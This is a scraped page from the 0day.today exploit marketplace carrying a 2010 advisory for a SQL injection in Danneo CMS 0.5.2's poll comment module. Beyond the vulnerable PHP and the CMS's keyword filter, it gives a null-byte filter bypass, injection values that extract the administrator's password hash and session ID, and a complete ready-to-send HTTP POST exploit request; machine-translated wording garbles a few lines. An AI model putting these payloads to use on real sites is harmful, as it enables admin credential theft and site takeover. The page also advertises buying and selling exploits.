0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Danneo CMS <= 0.5.2 SQL Injection Vulnerability

Author

0day Today Team

Risk

[

Security Risk Unsored

]

0day-ID

0day-ID-11004

Category

web applications

Date add

21-02-2010

Platform

unsorted

===============================================
Danneo CMS <= 0.5.2 SQL Injection Vulnerability
===============================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com

Product: Danneo CMS 0.5.2
Site: danneo.com


The new vulnerability is discovered in the module vote when adding comments.

Vulnerable code (/mod/poll/comment.php@124-130):

PHP code:

 $comtext=($setting['peditor']=="yes") ? commentparse($comtext) : deltags(commentparse($comtext)); 
$comname = (preparse($usermain['logged'],THIS_INT)==1 && preparse($usermain['userid'],THIS_INT)>0) ? $usermain['uname'] : substr(deltags($comname),0,50); 
$comtitle = substr(deltags($comtitle),0,255); 

$in = $db->query("INSERT INTO ".$basepref."_polling_comment VALUES 
                 (NULL,'".$id."','".$usermain['userid']."','".NEWTIME."', 
                 '$comname','$comtitle','$comtext','".REMOTE_ADDRS."')"); 


	
The vulnerability occurs after the cutoff line in the variable $ comtitle up to 255 characters, which gives the possibility of a fragmented SQL-injection.
However, realization of the vulnerability hampered filter (/base/danneo.track.php):

PHP code:

$baddata = array("UNION", 
                 "OUTFILE", 
                 "FROM", 
                 "SELECT", 
                 "WHERE", 
                 "SHUTDOWN", 
                 "UPDATE", 
                 "DELETE", 
                 "CHANGE", 
                 "MODIFY", 
                 "RENAME", 
                 "RELOAD", 
                 "ALTER", 
                 "GRANT", 
                 "DROP", 
                 "INSERT", 
                 "CONCAT", 
                 "cmd", 
                 "exec", 
                 "--" 
         /* ... */ 
                 ); 
foreach($_REQUEST as $params => $inputdata){ 
    foreach($baddata as $badkey => $badvalue){ 
        if(is_string($inputdata) && eregi($badvalue,$inputdata)){ $badcount=1; } 
    } 
} 


The filter can be successfully circumvented by using null-byte, which will not be escaped with magic_quotes_gpc = on.
(/base/danneo.function.php):

PHP code:

if(!ini_get("register_globals") || (@get_cfg_var('register_globals')==1)){ 
//@import_request_variables('GPC'); 
@extract($_COOKIE,EXTR_SKIP); 
@extract($_POST,EXTR_SKIP); 
@extract($_GET,EXTR_SKIP); 
@extract($_REQUEST,EXTR_SKIP); 
/* ... */ 
if(get_magic_quotes_gpc()) { 
if($_POST) $_POST = stripslashesall($_POST); 
if($_GET) $_GET = stripslashesall($_GET); 
if($_REQUEST) $_REQUEST = stripslashesall($_REQUEST); 
if($_COOKIE) $_COOKIE = stripslashesall($_COOKIE); 
} 


	
From the code above, it follows that if it enters the filter null-byte will be left without screening after treatment _REQUEST array function stripslashesall (), but
variables $ comname, $ comtitle, $ comtext be escaped with magic_quotes_gpc = on, because they are not extracted from the global arrays with otchischennymi incoming data, and from the local area.
This is because extract () is preceded stripslashesall ().

Despite the shielding, the vulnerability can be implemented with the following values:
$ comname az value of 5 characters to 10
$ comtitle 254 + character quote
$comtext /*%00*/, (SELECT adpwd FROM dn052_admin LIMIT 1), 1)-- -


As a result, the final query will be:


INSERT INTO dn052_polling_comment VALUES
(NULL,'1','0','1230987393',
'lololo','a[252 ???????]b\','/*\0*/, (SELECT adpwd FROM dn052_admin LIMIT 1), 1)-- -','127.0.0.1')

	
After substr () appears \ that screens the following quote and makes it possible to perform SQL-package $ comtext.
To prevent errors of syntax null-bytes (note here that he has already undergone screening) is among the symbols of comments / * * /.
As a result, when displaying comments to vote in the text field value appears md5 hash of the admin. You can also get the session ID administrator, if it is authenticated and the lifetime of the session has not expired:
$ comtext / *% 00 * /, (SELECT hash FROM dn052_admin_sess LIMIT 1), 1) - --
Prefix table, you can see if the settings in CMS enabled debug-mode for MySQL. To do this you need to call a deliberate syntax error.
When magic_quotes_gpc = off in $ comtitle quote should be replaced by \, and 254 characters can be removed altogether.

As a result, the request will be so (you need to specify captcha):

code:

POST /index.php?dn=poll HTTP/1.0
User-Agent: Opera/9.63 (Windows NT 6.0; U; ru) Presto/2.1.1
Host: danneo
Referer: http://danneo/index.php?dn=poll&to=open&id=1
Content-Type: application/x-www-form-urlencoded
Connection: close

comname=lololo&comtitle=a++++++++++++++++++++++++++++++++++++++++  ++++++++++++++++++++++++++++++++++++++++++++++++++  ++++++++++++++++++++++++++++++++++++++++++++++++++  ++++++++++++++++++++++++++++++++++++++++++++++++++  ++++++++++++++++++++++++++++++++++++++++++++++++++  ++++++++++++b%27&comtext=%2F%2A%2500%2A%2F%2C+%28SELECT+adpwd+FROM+  dn052_admin+LIMIT+1%29%2C+1%29--+-&captcha=56334&id=1&ajax=0&re=comment


Also is present disclosure ways:
/ index.php? re =% 00



#  0day.today [2024-05-11]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Danneo CMS <= 0.5.2 SQL Injection Vulnerability

Report Error

Report Error